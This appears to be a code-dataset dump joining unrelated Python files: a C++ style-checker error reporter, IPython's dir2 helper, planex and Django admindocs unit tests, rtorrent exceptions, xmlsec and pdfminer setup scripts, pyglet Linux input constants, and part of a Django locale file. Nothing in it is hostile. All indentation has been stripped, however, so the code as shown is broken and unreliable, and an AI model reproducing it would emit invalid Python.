if nsiqcppstyle_checker.Search(r"//\s*NS", t.line) == None and not _nsiqcppstyle_state.CheckRuleSuppression(ruleName):
_nsiqcppstyle_state.IncrementErrorCount(ruleName, t.filename)
url = ""
if _nsiqcppstyle_state.showUrl :
url = "http://nsiqcppstyle.appspot.com/rule_doc/" + ruleName
if _nsiqcppstyle_state.output_format == 'emacs':
sys.stdout.write('%s:%s: %s [%s] %s\n' % (
t.filename, t.lineno, message, ruleName, url))
elif _nsiqcppstyle_state.output_format == 'vs7':
sys.stdout.write('%s(%s, %s): %s [%s] %s\n' % (
t.filename, t.lineno, t.column, message, ruleName, url))
elif _nsiqcppstyle_state.output_format == 'eclipse':
sys.stdout.write(' File "%s", line %d %s (%s)\n' %(t.filename, t.lineno, message, ruleName))
elif _nsiqcppstyle_state.output_format == 'csv':
global writer
writer.writerow((t.filename, t.lineno, t.column, message, ruleName, url))
elif _nsiqcppstyle_state.output_format == 'xml':
writer.write("""<error line='%d' col='%d' severity='warning' message='%s' source='%s'/>\n""" % (t.lineno, t.column, escape(message).replace("'", "\""), ruleName))
elif _nsiqcppstyle_state.output_format == 'html':
if _nsiqcppstyle_state.baseURL != '':
writer.write("""<li id="link"><a href=%s/%s#L%d>%s</a><ul id="detail"><li id="line">Line: %d - Column: %d</li><li id="rule">Rule: %s</li></ul>\n""" % (_nsiqcppstyle_state.baseURL, t.filename[t.filename.find(_nsiqcppstyle_state.base_dir):], t.lineno, t.filename[t.filename.find(_nsiqcppstyle_state.base_dir):].split('/').pop(), t.lineno, t.column, escape(message).replace("'", "\"")))
else:
writer.write("""<li id="link"><a href=%s/%s#L%d>%s</a><ul id="detail"><li id="line">Line: %d - Column: %d</li><li id="rule">Rule: %s</li></ul>\n""" % (_nsiqcppstyle_state.baseURL, t.filename[t.filename.find(_nsiqcppstyle_state.base_dir):], t.lineno, t.filename[t.filename.find(_nsiqcppstyle_state.base_dir):].split('/').pop(), t.lineno, t.column, escape(message).replace("'", "\"")))
Error = ErrorInternal
class DummyToken:
def __init__(self, filename, line, lineno, column):
self.filename = filename
self.line = line
if lineno == 0 :
lineno = 1
self.lineno = lineno
self.column = column
|
marinho/geraldo | refs/heads/master | site/newsite/site-geraldo/django/core/cache/backends/__init__.py | 12133432 | |
Radagast-red/golem | refs/heads/develop | golem/rpc/mapping/__init__.py | 12133432 | |
hellofreedom/ansible-modules-core | refs/heads/devel | cloud/amazon/__init__.py | 12133432 | |
sodafree/backend | refs/heads/master | build/ipython/build/lib.linux-i686-2.7/IPython/utils/dir2.py | 5 | # encoding: utf-8
"""A fancy version of Python's builtin :func:`dir` function.
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
def get_class_members(cls):
ret = dir(cls)
if hasattr(cls, '__bases__'):
try:
bases = cls.__bases__
except AttributeError:
# `obj` lied to hasattr (e.g. Pyro), ignore
pass
else:
for base in bases:
ret.extend(get_class_members(base))
return ret
def dir2(obj):
"""dir2(obj) -> list of strings
Extended version of the Python builtin dir(), which does a few extra
checks, and supports common objects with unusual internals that confuse
dir(), such as Traits and PyCrust.
This version is guaranteed to return only a list of true strings, whereas
dir() returns anything that objects inject into themselves, even if they
are later not really valid for attribute access (many extension libraries
have such bugs).
"""
# Start building the attribute list via dir(), and then complete it
# with a few extra special-purpose calls.
words = set(dir(obj))
if hasattr(obj, '__class__'):
#words.add('__class__')
words |= set(get_class_members(obj.__class__))
# for objects with Enthought's traits, add trait_names() list
# for PyCrust-style, add _getAttributeNames() magic method list
for attr in ('trait_names', '_getAttributeNames'):
if hasattr(obj, attr):
try:
func = getattr(obj, attr)
if callable(func):
words |= set(func())
except:
# TypeError: obj is class not instance
pass
# filter out non-string attributes which may be stuffed by dir() calls
# and poor coding in third-party modules
words = [w for w in words if isinstance(w, basestring)]
return sorted(words)
|
jonludlam/planex | refs/heads/master | tests/test_planex_spec.py | 2 | # Run these tests with 'nosetests':
# install the 'python-nose' package (Fedora/CentOS or Ubuntu)
# run 'nosetests' in the root of the repository
import unittest
import platform
import planex.spec
def get_rpm_machine():
if platform.machine() == 'x86_64':
return 'x86_64'
return 'i386'
def get_deb_machine():
if platform.machine() == 'x86_64':
return 'amd64'
return 'i386'
class RpmTests(unittest.TestCase):
def setUp(self):
# 'setUp' breaks Pylint's naming rules
# pylint: disable=C0103
self.spec = planex.spec.Spec("tests/data/ocaml-cohttp.spec",
dist=".el6")
def test_good_filename_preprocessor(self):
planex.spec.Spec("tests/data/ocaml-cohttp.spec.in")
def test_bad_filename(self):
self.assertRaises(planex.spec.SpecNameMismatch, planex.spec.Spec,
"tests/data/bad-name.spec")
def test_bad_filename_preprocessor(self):
self.assertRaises(planex.spec.SpecNameMismatch, planex.spec.Spec,
"tests/data/bad-name.spec.in")
def test_name(self):
self.assertEqual(self.spec.name(), "ocaml-cohttp")
def test_specpath(self):
self.assertEqual(self.spec.specpath(), "./SPECS/ocaml-cohttp.spec")
def test_version(self):
self.assertEqual(self.spec.version(), "0.9.8")
def test_provides(self):
self.assertEqual(self.spec.provides(),
set(["ocaml-cohttp", "ocaml-cohttp-devel"]))
def test_source_urls(self):
self.assertEqual(self.spec.source_urls(),
["https://github.com/mirage/ocaml-cohttp/archive/"
"ocaml-cohttp-0.9.8/ocaml-cohttp-0.9.8.tar.gz",
"file:///code/ocaml-cohttp-extra#ocaml-cohttp-extra-0.9.8.tar.gz",
"ocaml-cohttp-init"])
def test_source_paths(self):
self.assertEqual(self.spec.source_paths(),
["./SOURCES/ocaml-cohttp-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-extra-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-init"])
def test_buildrequires(self):
self.assertEqual(self.spec.buildrequires(),
set(["ocaml", "ocaml-findlib", "ocaml-re-devel",
"ocaml-uri-devel", "ocaml-cstruct-devel",
"ocaml-lwt-devel", "ocaml-ounit-devel",
"ocaml-ocamldoc", "ocaml-camlp4-devel",
"openssl", "openssl-devel"]))
def test_source_package_path(self):
self.assertEqual(self.spec.source_package_path(),
"./SRPMS/ocaml-cohttp-0.9.8-1.el6.src.rpm")
def test_binary_package_paths(self):
machine = get_rpm_machine()
self.assertEqual(
sorted(self.spec.binary_package_paths()),
[
path.format(machine=machine) for path in
sorted([
"./RPMS/{machine}/ocaml-cohttp-0.9.8-1.el6.{machine}.rpm",
"./RPMS/{machine}/ocaml-cohttp-devel-0.9.8-1.el6.{machine}.rpm"])
]
)
class DebTests(unittest.TestCase):
def setUp(self):
# 'setUp' breaks Pylint's naming rules
# pylint: disable=C0103
def map_rpm_to_deb(name):
mapping = {"ocaml-cohttp": ["libcohttp-ocaml"],
"ocaml-cohttp-devel": ["libcohttp-ocaml-dev"],
"ocaml": ["ocaml-nox", "ocaml-native-compilers"],
"ocaml-findlib": ["ocaml-findlib"],
"ocaml-re-devel": ["libre-ocaml-dev"],
"ocaml-uri-devel": ["liburi-ocaml-dev"],
"ocaml-cstruct-devel": ["libcstruct-ocaml-dev"],
"ocaml-lwt-devel": ["liblwt-ocaml-dev"],
"ocaml-ounit-devel": ["libounit-ocaml-dev"],
"ocaml-ocamldoc": ["ocaml-nox"],
"ocaml-camlp4-devel": ["camlp4", "camlp4-extra"],
"openssl": ["libssl1.0.0"],
"openssl-devel": ["libssl-dev"]}
return mapping[name]
self.spec = planex.spec.Spec("./tests/data/ocaml-cohttp.spec",
target="deb",
map_name=map_rpm_to_deb)
def test_name(self):
self.assertEqual(self.spec.name(), "ocaml-cohttp")
def test_specpath(self):
self.assertEqual(self.spec.specpath(), "./SPECS/ocaml-cohttp.spec")
def test_version(self):
self.assertEqual(self.spec.version(), "0.9.8")
def test_provides(self):
self.assertEqual(self.spec.provides(),
set(["libcohttp-ocaml", "libcohttp-ocaml-dev"]))
def test_source_urls(self):
self.assertEqual(self.spec.source_urls(),
["https://github.com/mirage/ocaml-cohttp/archive/"
"ocaml-cohttp-0.9.8/ocaml-cohttp-0.9.8.tar.gz",
"file:///code/ocaml-cohttp-extra#ocaml-cohttp-extra-0.9.8.tar.gz",
"ocaml-cohttp-init"])
def test_source_paths(self):
self.assertEqual(self.spec.source_paths(),
["./SOURCES/ocaml-cohttp-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-extra-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-init"])
def test_buildrequires(self):
self.assertEqual(self.spec.buildrequires(),
set(["ocaml-nox", "ocaml-native-compilers",
"ocaml-findlib", "libre-ocaml-dev",
"liburi-ocaml-dev", "libcstruct-ocaml-dev",
"liblwt-ocaml-dev", "libounit-ocaml-dev",
"camlp4", "camlp4-extra", "libssl1.0.0",
"libssl-dev"]))
def test_source_package_path(self):
self.assertEqual(self.spec.source_package_path(),
"./SRPMS/libcohttp-ocaml_0.9.8-1.dsc")
def test_binary_package_paths(self):
machine = get_deb_machine()
self.assertEqual(sorted(self.spec.binary_package_paths()),
[
path.format(machine=machine) for path in
sorted(["./RPMS/libcohttp-ocaml_0.9.8-1_{machine}.deb",
"./RPMS/libcohttp-ocaml-dev_0.9.8-1_{machine}.deb"])
]
)
|
ptoraskar/django | refs/heads/master | django/contrib/admindocs/tests/test_fields.py | 638 | from __future__ import unicode_literals
import unittest
from django.contrib.admindocs import views
from django.db import models
from django.db.models import fields
from django.utils.translation import ugettext as _
class CustomField(models.Field):
description = "A custom field type"
class DescriptionLackingField(models.Field):
pass
class TestFieldType(unittest.TestCase):
def setUp(self):
pass
def test_field_name(self):
self.assertRaises(
AttributeError,
views.get_readable_field_data_type, "NotAField"
)
def test_builtin_fields(self):
self.assertEqual(
views.get_readable_field_data_type(fields.BooleanField()),
_('Boolean (Either True or False)')
)
def test_custom_fields(self):
self.assertEqual(
views.get_readable_field_data_type(CustomField()),
'A custom field type'
)
self.assertEqual(
views.get_readable_field_data_type(DescriptionLackingField()),
_('Field of type: %(field_type)s') % {
'field_type': 'DescriptionLackingField'
}
)
|
nopjmp/SickRage | refs/heads/master | lib/rtorrent/err.py | 182 | # Copyright (c) 2013 Chris Lucas, <chris@chrisjlucas.com>
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from rtorrent.common import convert_version_tuple_to_str
class RTorrentVersionError(Exception):
def __init__(self, min_version, cur_version):
self.min_version = min_version
self.cur_version = cur_version
self.msg = "Minimum version required: {0}".format(
convert_version_tuple_to_str(min_version))
def __str__(self):
return(self.msg)
class MethodError(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return(self.msg)
|
concordusapps/python-xmlsec | refs/heads/master | setup.py | 1 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# from __future__ import absolute_import, unicode_literals, division
from os import path
from pkgutil import get_importer
from setuptools import setup, Extension
from functools import wraps
def lazy(function):
@wraps(function)
def wrapped(*args, **kwargs):
class LazyProxy(object):
def __init__(self, function, args, kwargs):
self._function = function
self._args = args
self._kwargs = kwargs
self._result = None
def __getattribute__(self, name):
if name in ['_function', '_args', '_kwargs', '_result']:
return super(LazyProxy, self).__getattribute__(name)
if self._result is None:
self._result = self._function(*self._args, **self._kwargs)
return object.__getattribute__(self._result, name)
def __setattr__(self, name, value):
if name in ['_function', '_args', '_kwargs', '_result']:
super(LazyProxy, self).__setattr__(name, value)
return
if self._result is None:
self._result = self._function(*self._args, **self._kwargs)
setattr(self._result, name, value)
return LazyProxy(function, args, kwargs)
return wrapped
class Extension(Extension, object):
lxml_extended = False
@property
def include_dirs(self):
dirs = self.__dict__['include_dirs']
if self.lxml_extended:
return dirs
# Resolve lxml include directories.
import lxml
lxml_base = path.dirname(lxml.__file__)
lxml_include = path.join(lxml_base, 'includes')
dirs.insert(0, lxml_include)
dirs.insert(0, lxml_base)
self.lxml_extended = True
return dirs
@include_dirs.setter
def include_dirs(self, dirs):
self.__dict__['include_dirs'] = dirs
@lazy
def make_extension(name, cython=True):
from pkgconfig import parse
# Declare the crypto implementation.
XMLSEC_CRYPTO = 'openssl'
# Process the `pkg-config` utility and discover include and library
# directories.
config = {}
for lib in ['libxml-2.0', 'xmlsec1-%s' % XMLSEC_CRYPTO]:
config.update(parse(lib))
# List-ify config for setuptools.
for key in config:
config[key] = list(config[key])
# Add the source directories for inclusion.
config['include_dirs'].insert(0, 'src')
# Resolve extension location from name.
location = path.join('src', *name.split('.'))
location += '.pyx' if cython else '.c'
# Create and return the extension.
return Extension(name, [location], **config)
# Navigate, import, and retrieve the metadata of the project.
meta = get_importer('src/xmlsec').find_module('meta').load_module('meta')
setup(
name='xmlsec',
version=meta.version,
description=meta.description,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Cython',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Topic :: Text Processing :: Markup :: XML'
],
author='Concordus Applications',
author_email='support@concordusapps.com',
url='https://github.com/concordusapps/python-xmlsec',
setup_requires=[
'setuptools_cython',
'pkgconfig',
'lxml >= 3.0',
],
install_requires=[
'lxml >= 3.0',
],
extras_require={
'test': ['pytest']
},
package_dir={'xmlsec': 'src/xmlsec'},
packages=['xmlsec'],
ext_modules=[
make_extension('xmlsec.constants'),
make_extension('xmlsec.utils'),
make_extension('xmlsec.tree'),
make_extension('xmlsec.key'),
make_extension('xmlsec.ds'),
make_extension('xmlsec.template'),
]
)
|
mpasternak/pyglet-fix-issue-518-522 | refs/heads/master | experimental/input/linux_const.py | 28 | #!/usr/bin/env python
'''Event constants from /usr/include/linux/input.h
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
EV_SYN = 0x00
EV_KEY = 0x01
EV_REL = 0x02
EV_ABS = 0x03
EV_MSC = 0x04
EV_LED = 0x11
EV_SND = 0x12
EV_REP = 0x14
EV_FF = 0x15
EV_PWR = 0x16
EV_FF_STATUS = 0x17
EV_MAX = 0x1f
# Synchronization events.
SYN_REPORT = 0
SYN_CONFIG = 1
# Keys and buttons
KEY_RESERVED = 0
KEY_ESC = 1
KEY_1 = 2
KEY_2 = 3
KEY_3 = 4
KEY_4 = 5
KEY_5 = 6
KEY_6 = 7
KEY_7 = 8
KEY_8 = 9
KEY_9 = 10
KEY_0 = 11
KEY_MINUS = 12
KEY_EQUAL = 13
KEY_BACKSPACE = 14
KEY_TAB = 15
KEY_Q = 16
KEY_W = 17
KEY_E = 18
KEY_R = 19
KEY_T = 20
KEY_Y = 21
KEY_U = 22
KEY_I = 23
KEY_O = 24
KEY_P = 25
KEY_LEFTBRACE = 26
KEY_RIGHTBRACE = 27
KEY_ENTER = 28
KEY_LEFTCTRL = 29
KEY_A = 30
KEY_S = 31
KEY_D = 32
KEY_F = 33
KEY_G = 34
KEY_H = 35
KEY_J = 36
KEY_K = 37
KEY_L = 38
KEY_SEMICOLON = 39
KEY_APOSTROPHE = 40
KEY_GRAVE = 41
KEY_LEFTSHIFT = 42
KEY_BACKSLASH = 43
KEY_Z = 44
KEY_X = 45
KEY_C = 46
KEY_V = 47
KEY_B = 48
KEY_N = 49
KEY_M = 50
KEY_COMMA = 51
KEY_DOT = 52
KEY_SLASH = 53
KEY_RIGHTSHIFT = 54
KEY_KPASTERISK = 55
KEY_LEFTALT = 56
KEY_SPACE = 57
KEY_CAPSLOCK = 58
KEY_F1 = 59
KEY_F2 = 60
KEY_F3 = 61
KEY_F4 = 62
KEY_F5 = 63
KEY_F6 = 64
KEY_F7 = 65
KEY_F8 = 66
KEY_F9 = 67
KEY_F10 = 68
KEY_NUMLOCK = 69
KEY_SCROLLLOCK = 70
KEY_KP7 = 71
KEY_KP8 = 72
KEY_KP9 = 73
KEY_KPMINUS = 74
KEY_KP4 = 75
KEY_KP5 = 76
KEY_KP6 = 77
KEY_KPPLUS = 78
KEY_KP1 = 79
KEY_KP2 = 80
KEY_KP3 = 81
KEY_KP0 = 82
KEY_KPDOT = 83
KEY_ZENKAKUHANKAKU = 85
KEY_102ND = 86
KEY_F11 = 87
KEY_F12 = 88
KEY_RO = 89
KEY_KATAKANA = 90
KEY_HIRAGANA = 91
KEY_HENKAN = 92
KEY_KATAKANAHIRAGANA = 93
KEY_MUHENKAN = 94
KEY_KPJPCOMMA = 95
KEY_KPENTER = 96
KEY_RIGHTCTRL = 97
KEY_KPSLASH = 98
KEY_SYSRQ = 99
KEY_RIGHTALT = 100
KEY_LINEFEED = 101
KEY_HOME = 102
KEY_UP = 103
KEY_PAGEUP = 104
KEY_LEFT = 105
KEY_RIGHT = 106
KEY_END = 107
KEY_DOWN = 108
KEY_PAGEDOWN = 109
KEY_INSERT = 110
KEY_DELETE = 111
KEY_MACRO = 112
KEY_MUTE = 113
KEY_VOLUMEDOWN = 114
KEY_VOLUMEUP = 115
KEY_POWER = 116
KEY_KPEQUAL = 117
KEY_KPPLUSMINUS = 118
KEY_PAUSE = 119
KEY_KPCOMMA = 121
KEY_HANGUEL = 122
KEY_HANJA = 123
KEY_YEN = 124
KEY_LEFTMETA = 125
KEY_RIGHTMETA = 126
KEY_COMPOSE = 127
KEY_STOP = 128
KEY_AGAIN = 129
KEY_PROPS = 130
KEY_UNDO = 131
KEY_FRONT = 132
KEY_COPY = 133
KEY_OPEN = 134
KEY_PASTE = 135
KEY_FIND = 136
KEY_CUT = 137
KEY_HELP = 138
KEY_MENU = 139
KEY_CALC = 140
KEY_SETUP = 141
KEY_SLEEP = 142
KEY_WAKEUP = 143
KEY_FILE = 144
KEY_SENDFILE = 145
KEY_DELETEFILE = 146
KEY_XFER = 147
KEY_PROG1 = 148
KEY_PROG2 = 149
KEY_WWW = 150
KEY_MSDOS = 151
KEY_COFFEE = 152
KEY_DIRECTION = 153
KEY_CYCLEWINDOWS = 154
KEY_MAIL = 155
KEY_BOOKMARKS = 156
KEY_COMPUTER = 157
KEY_BACK = 158
KEY_FORWARD = 159
KEY_CLOSECD = 160
KEY_EJECTCD = 161
KEY_EJECTCLOSECD = 162
KEY_NEXTSONG = 163
KEY_PLAYPAUSE = 164
KEY_PREVIOUSSONG = 165
KEY_STOPCD = 166
KEY_RECORD = 167
KEY_REWIND = 168
KEY_PHONE = 169
KEY_ISO = 170
KEY_CONFIG = 171
KEY_HOMEPAGE = 172
KEY_REFRESH = 173
KEY_EXIT = 174
KEY_MOVE = 175
KEY_EDIT = 176
KEY_SCROLLUP = 177
KEY_SCROLLDOWN = 178
KEY_KPLEFTPAREN = 179
KEY_KPRIGHTPAREN = 180
KEY_F13 = 183
KEY_F14 = 184
KEY_F15 = 185
KEY_F16 = 186
KEY_F17 = 187
KEY_F18 = 188
KEY_F19 = 189
KEY_F20 = 190
KEY_F21 = 191
KEY_F22 = 192
KEY_F23 = 193
KEY_F24 = 194
KEY_PLAYCD = 200
KEY_PAUSECD = 201
KEY_PROG3 = 202
KEY_PROG4 = 203
KEY_SUSPEND = 205
KEY_CLOSE = 206
KEY_PLAY = 207
KEY_FASTFORWARD = 208
KEY_BASSBOOST = 209
KEY_PRINT = 210
KEY_HP = 211
KEY_CAMERA = 212
KEY_SOUND = 213
KEY_QUESTION = 214
KEY_EMAIL = 215
KEY_CHAT = 216
KEY_SEARCH = 217
KEY_CONNECT = 218
KEY_FINANCE = 219
KEY_SPORT = 220
KEY_SHOP = 221
KEY_ALTERASE = 222
KEY_CANCEL = 223
KEY_BRIGHTNESSDOWN = 224
KEY_BRIGHTNESSUP = 225
KEY_MEDIA = 226
KEY_UNKNOWN = 240
BTN_MISC = 0x100
BTN_0 = 0x100
BTN_1 = 0x101
BTN_2 = 0x102
BTN_3 = 0x103
BTN_4 = 0x104
BTN_5 = 0x105
BTN_6 = 0x106
BTN_7 = 0x107
BTN_8 = 0x108
BTN_9 = 0x109
BTN_MOUSE = 0x110
BTN_LEFT = 0x110
BTN_RIGHT = 0x111
BTN_MIDDLE = 0x112
BTN_SIDE = 0x113
BTN_EXTRA = 0x114
BTN_FORWARD = 0x115
BTN_BACK = 0x116
BTN_TASK = 0x117
BTN_JOYSTICK = 0x120
BTN_TRIGGER = 0x120
BTN_THUMB = 0x121
BTN_THUMB2 = 0x122
BTN_TOP = 0x123
BTN_TOP2 = 0x124
BTN_PINKIE = 0x125
BTN_BASE = 0x126
BTN_BASE2 = 0x127
BTN_BASE3 = 0x128
BTN_BASE4 = 0x129
BTN_BASE5 = 0x12a
BTN_BASE6 = 0x12b
BTN_DEAD = 0x12f
BTN_GAMEPAD = 0x130
BTN_A = 0x130
BTN_B = 0x131
BTN_C = 0x132
BTN_X = 0x133
BTN_Y = 0x134
BTN_Z = 0x135
BTN_TL = 0x136
BTN_TR = 0x137
BTN_TL2 = 0x138
BTN_TR2 = 0x139
BTN_SELECT = 0x13a
BTN_START = 0x13b
BTN_MODE = 0x13c
BTN_THUMBL = 0x13d
BTN_THUMBR = 0x13e
BTN_DIGI = 0x140
BTN_TOOL_PEN = 0x140
BTN_TOOL_RUBBER = 0x141
BTN_TOOL_BRUSH = 0x142
BTN_TOOL_PENCIL = 0x143
BTN_TOOL_AIRBRUSH = 0x144
BTN_TOOL_FINGER = 0x145
BTN_TOOL_MOUSE = 0x146
BTN_TOOL_LENS = 0x147
BTN_TOUCH = 0x14a
BTN_STYLUS = 0x14b
BTN_STYLUS2 = 0x14c
BTN_TOOL_DOUBLETAP = 0x14d
BTN_TOOL_TRIPLETAP = 0x14e
BTN_WHEEL = 0x150
BTN_GEAR_DOWN = 0x150
BTN_GEAR_UP = 0x151
KEY_OK = 0x160
KEY_SELECT = 0x161
KEY_GOTO = 0x162
KEY_CLEAR = 0x163
KEY_POWER2 = 0x164
KEY_OPTION = 0x165
KEY_INFO = 0x166
KEY_TIME = 0x167
KEY_VENDOR = 0x168
KEY_ARCHIVE = 0x169
KEY_PROGRAM = 0x16a
KEY_CHANNEL = 0x16b
KEY_FAVORITES = 0x16c
KEY_EPG = 0x16d
KEY_PVR = 0x16e
KEY_MHP = 0x16f
KEY_LANGUAGE = 0x170
KEY_TITLE = 0x171
KEY_SUBTITLE = 0x172
KEY_ANGLE = 0x173
KEY_ZOOM = 0x174
KEY_MODE = 0x175
KEY_KEYBOARD = 0x176
KEY_SCREEN = 0x177
KEY_PC = 0x178
KEY_TV = 0x179
KEY_TV2 = 0x17a
KEY_VCR = 0x17b
KEY_VCR2 = 0x17c
KEY_SAT = 0x17d
KEY_SAT2 = 0x17e
KEY_CD = 0x17f
KEY_TAPE = 0x180
KEY_RADIO = 0x181
KEY_TUNER = 0x182
KEY_PLAYER = 0x183
KEY_TEXT = 0x184
KEY_DVD = 0x185
KEY_AUX = 0x186
KEY_MP3 = 0x187
KEY_AUDIO = 0x188
KEY_VIDEO = 0x189
KEY_DIRECTORY = 0x18a
KEY_LIST = 0x18b
KEY_MEMO = 0x18c
KEY_CALENDAR = 0x18d
KEY_RED = 0x18e
KEY_GREEN = 0x18f
KEY_YELLOW = 0x190
KEY_BLUE = 0x191
KEY_CHANNELUP = 0x192
KEY_CHANNELDOWN = 0x193
KEY_FIRST = 0x194
KEY_LAST = 0x195
KEY_AB = 0x196
KEY_NEXT = 0x197
KEY_RESTART = 0x198
KEY_SLOW = 0x199
KEY_SHUFFLE = 0x19a
KEY_BREAK = 0x19b
KEY_PREVIOUS = 0x19c
KEY_DIGITS = 0x19d
KEY_TEEN = 0x19e
KEY_TWEN = 0x19f
KEY_DEL_EOL = 0x1c0
KEY_DEL_EOS = 0x1c1
KEY_INS_LINE = 0x1c2
KEY_DEL_LINE = 0x1c3
KEY_FN = 0x1d0
KEY_FN_ESC = 0x1d1
KEY_FN_F1 = 0x1d2
KEY_FN_F2 = 0x1d3
KEY_FN_F3 = 0x1d4
KEY_FN_F4 = 0x1d5
KEY_FN_F5 = 0x1d6
KEY_FN_F6 = 0x1d7
KEY_FN_F7 = 0x1d8
KEY_FN_F8 = 0x1d9
KEY_FN_F9 = 0x1da
KEY_FN_F10 = 0x1db
KEY_FN_F11 = 0x1dc
KEY_FN_F12 = 0x1dd
KEY_FN_1 = 0x1de
KEY_FN_2 = 0x1df
KEY_FN_D = 0x1e0
KEY_FN_E = 0x1e1
KEY_FN_F = 0x1e2
KEY_FN_S = 0x1e3
KEY_FN_B = 0x1e4
KEY_MAX = 0x1ff
# Relative axes
REL_X = 0x00
REL_Y = 0x01
REL_Z = 0x02
REL_RX = 0x03
REL_RY = 0x04
REL_RZ = 0x05
REL_HWHEEL = 0x06
REL_DIAL = 0x07
REL_WHEEL = 0x08
REL_MISC = 0x09
REL_MAX = 0x0f
# Absolute axes
ABS_X = 0x00
ABS_Y = 0x01
ABS_Z = 0x02
ABS_RX = 0x03
ABS_RY = 0x04
ABS_RZ = 0x05
ABS_THROTTLE = 0x06
ABS_RUDDER = 0x07
ABS_WHEEL = 0x08
ABS_GAS = 0x09
ABS_BRAKE = 0x0a
ABS_HAT0X = 0x10
ABS_HAT0Y = 0x11
ABS_HAT1X = 0x12
ABS_HAT1Y = 0x13
ABS_HAT2X = 0x14
ABS_HAT2Y = 0x15
ABS_HAT3X = 0x16
ABS_HAT3Y = 0x17
ABS_PRESSURE = 0x18
ABS_DISTANCE = 0x19
ABS_TILT_X = 0x1a
ABS_TILT_Y = 0x1b
ABS_TOOL_WIDTH = 0x1c
ABS_VOLUME = 0x20
ABS_MISC = 0x28
ABS_MAX = 0x3f
# Misc events
MSC_SERIAL = 0x00
MSC_PULSELED = 0x01
MSC_GESTURE = 0x02
MSC_RAW = 0x03
MSC_SCAN = 0x04
MSC_MAX = 0x07
# LEDs
LED_NUML = 0x00
LED_CAPSL = 0x01
LED_SCROLLL = 0x02
LED_COMPOSE = 0x03
LED_KANA = 0x04
LED_SLEEP = 0x05
LED_SUSPEND = 0x06
LED_MUTE = 0x07
LED_MISC = 0x08
LED_MAIL = 0x09
LED_CHARGING = 0x0a
LED_MAX = 0x0f
# Autorepeat values
REP_DELAY = 0x00
REP_PERIOD = 0x01
REP_MAX = 0x01
# Sounds
SND_CLICK = 0x00
SND_BELL = 0x01
SND_TONE = 0x02
SND_MAX = 0x07
# IDs.
ID_BUS = 0
ID_VENDOR = 1
ID_PRODUCT = 2
ID_VERSION = 3
BUS_PCI = 0x01
BUS_ISAPNP = 0x02
BUS_USB = 0x03
BUS_HIL = 0x04
BUS_BLUETOOTH = 0x05
BUS_ISA = 0x10
BUS_I8042 = 0x11
BUS_XTKBD = 0x12
BUS_RS232 = 0x13
BUS_GAMEPORT = 0x14
BUS_PARPORT = 0x15
BUS_AMIGA = 0x16
BUS_ADB = 0x17
BUS_I2C = 0x18
BUS_HOST = 0x19
# Values describing the status of an effect
FF_STATUS_STOPPED = 0x00
FF_STATUS_PLAYING = 0x01
FF_STATUS_MAX = 0x01
|
HIPERCUBE/ReturnA | refs/heads/master | DataCrawler/lib/build/lib/pdfminer/setup.py | 5 | #!/usr/bin/env python
from distutils.core import setup
from pdfminer import __version__
setup(
name='pdfminer',
version=__version__,
description='PDF parser and analyzer',
long_description='''PDFMiner is a tool for extracting information from PDF documents.
Unlike other PDF-related tools, it focuses entirely on getting
and analyzing text data. PDFMiner allows to obtain
the exact location of texts in a page, as well as
other information such as fonts or lines.
It includes a PDF converter that can transform PDF files
into other text formats (such as HTML). It has an extensible
PDF parser that can be used for other purposes instead of text analysis.''',
license='MIT/X',
author='Yusuke Shinyama',
author_email='yusuke at cs dot nyu dot edu',
url='http://euske.github.io/pdfminer/index.html',
packages=[
'pdfminer',
],
package_data={
'pdfminer': ['cmap/*.pickle.gz']
},
scripts=[
'tools/pdf2txt.py',
'tools/dumppdf.py',
'tools/latin2ascii.py',
],
keywords=['pdf parser', 'pdf converter', 'layout analysis', 'text mining'],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Topic :: Text Processing',
],
)
|
marcelocure/django | refs/heads/master | django/conf/locale/pl/formats.py | 504 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j E Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j E Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j F'
SHORT_DATE_FORMAT = 'd-m-Y'
SHORT_DATETIME_FORMAT = 'd-m-Y H:i'
FIRST_DAY_OF_WEEK = 1 # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
